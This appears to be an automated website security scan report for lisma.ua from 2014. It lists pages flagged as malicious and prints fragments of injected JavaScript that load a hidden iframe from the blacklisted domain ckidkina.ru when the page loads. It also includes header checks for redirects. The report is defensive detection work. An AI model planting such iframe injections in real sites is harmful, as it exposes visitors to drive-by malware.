Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=lisma.ua
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://lisma.ua/ | 200 OK Content-Length: 23149 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/ru/profile/registration/ | 200 OK Content-Length: 23535 Content-Type: text/html | clean |
http://lisma.ua/ru/wallpapers/ | 200 OK Content-Length: 29221 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/images/wop.js | 200 OK Content-Length: 725 Content-Type: text/javascript | clean |
http://lisma.ua/images/main.js | 200 OK Content-Length: 352 Content-Type: text/javascript | clean |
http://lisma.ua/images/swap.js | 200 OK Content-Length: 1024 Content-Type: text/javascript | clean |
http://lisma.ua/ru/ | 200 OK Content-Length: 23140 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/netcat/modules/auth/password_recovery.php | 200 OK Content-Length: 21738 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var plugin = (navigator.mimeTypes && navigator.mimeTypes["application/x-shockwave-flash"]) ? navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin : 0; if(plugin){ plugin=(parseInt(plugin.description.substring(plugin.description.indexOf(".")-1))>=4); } else if((navigator.userAgent && navigator.userAgent.indexOf("MSIE")>=0)&&((navigator.userAgent.indexOf("Windows 95")>=0)||(navigator.userAgent.indexOf("Windows 98")>=0)||(navigator.userAgent document.write('<EMBED src="/images/logo.swf" menu=false quality=high wmode=transparent WIDTH="200" HEIGHT="100" NAME="alice" ALIGN="" TYPE="application/x-shockwave-flash" PLUGINSPAGE="http://www.macromedia.com/go/getflashplayer">'); document.write('</EMBED></OBJECT>'); } else { document.write('<img src="/images/logo.gif" width="200" height="100" border="0">'); } Antivirus reports:
| ||
http://lisma.ua/ru/news/news_11.html | 200 OK Content-Length: 22732 Content-Type: text/html | clean |
http://lisma.ua/ru/lisma/ | 200 OK Content-Length: 32345 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/ru/news/ | 200 OK Content-Length: 25507 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/ru/all/ | 200 OK Content-Length: 38139 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/ru/interesting/ | 200 OK Content-Length: 35335 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/ru/action/ | 200 OK Content-Length: 23337 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } | ||
http://lisma.ua/ru/lismaletters/ | 200 OK Content-Length: 24144 Content-Type: text/html | malicious |
Malicious code found. Script contains blacklisted domain: ckidkina.ru ...[575 bytes skipped]... iframe.setAttribute("frameBorder", "0"); var dels = document.getElementsByTagName("DIV"); if(dels.length == 0){document.body.appendChild(iframe);} else{document.getElementsByTagName("DIV")[dels.length-1].appendChild(iframe);} iframe.src = url; return true; } } function gtkhjasd454hfhf235(){ create_frame("http://ckidkina.ru/?id=ifrm"); } try { if(window.attachEvent) { window.attachEvent('onload', gtkhjasd454hfhf235); } else { if(window.onload) { var curronload = window.onload; var newonload = function() { curronload(); gtkhjasd454hfhf235(); }; window.onload = newonload; } else { window.on ...[78 bytes skipped]... Decoded script: function gtkhjasd454hfhf235() { create_frame("http://ckidkina.ru/?id=ifrm"); } |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: lisma.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 03:02:29 GMT
Server: Apache/2.2.15 (CentOS)
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/5.3.3
GET / HTTP/1.1
Host: lisma.ua
Result:
HTTP/1.1 200 OK
Connection: close
Date: Thu, 09 Oct 2014 03:02:29 GMT
Server: Apache/2.2.15 (CentOS)
Content-Type: text/html; charset=windows-1251
X-Powered-By: PHP/5.3.3
Second query (visit from search engine):
GET / HTTP/1.1
Host: lisma.ua
Referer: http://www.google.com/search?q=lisma.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: lisma.ua
Referer: http://www.google.com/search?q=lisma.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.